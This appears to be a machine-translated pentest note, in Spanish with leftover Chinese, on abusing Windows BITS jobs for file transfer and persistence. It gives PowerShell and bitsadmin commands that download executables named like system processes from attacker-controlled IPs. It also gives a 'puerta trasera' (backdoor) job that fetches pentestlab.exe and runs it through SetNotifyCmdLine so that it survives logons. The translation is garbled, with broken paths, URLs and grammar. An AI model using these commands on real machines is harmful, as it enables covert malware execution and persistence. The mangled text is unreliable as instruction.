一, Bits de empleo
Antecedentes ventanas de transferencia inteligente en segundo plano Service Servicio de transferencia inteligente en segundo plano (BITS), HTTP o SMB para la transferencia de archivos, sino que puede establecer la prioridad de la tarea y descarga asincrónica, el ancho de banda de regulación inteligente, a fin de no tener los recursos de red para otras aplicaciones.
PowerShell y Bitsadmin.exe se pueden utilizar para crear y administrar los bits de empleo, powershell pero parece que sólo es compatible con la transferencia de archivos, ventanas Bitsadmin.exe programa nativo también es compatible con la aplicación del código después de que la transferencia se ha completado.
二, Ejecución
# PowerShell传输文件 Start-BitsTransfer -Source http://192.168.240.135/csrss.exe - Destino C: \ Users \ win10 \ Desktop \ csrss.exe # herramienta bitsadmin传输文件 bitsadmin / transferencia de prueba / descarga / prioridad alta http: //192.168.240.135/ acrotray.exe C: \ Users \ win10 \ Desktop \ acrotray.exe
El siguiente método se puede utilizar para construir una bitsjob, bitsjob realiza de forma automática cuando el usuario de inicio de sesión interactiva, a no ser completa o cancelarlo, el sistema automáticamente cancelará o 90 días. Esto lograr el propósito de residir
# El archivo ejecutable después de una descarga (Python tomará el error simple httpserver 10054, este paso no es experimentos locales) bitsadmin / la puerta trasera Crear bitsadmin / AddFile puerta trasera " http://10.0.2.21/pentestlab.exe " " C: \ tmp \ pentestlab. EXE " bitsadmin / SetNotifyCmdLine puerta trasera C: \ tmp \ pentestlab.exe NUL bitsadmin / Reanudar Backdoor # completado o cancelado bitsjob bitsadmin / completa Backdoor bitsadmin / cancelar la puerta trasera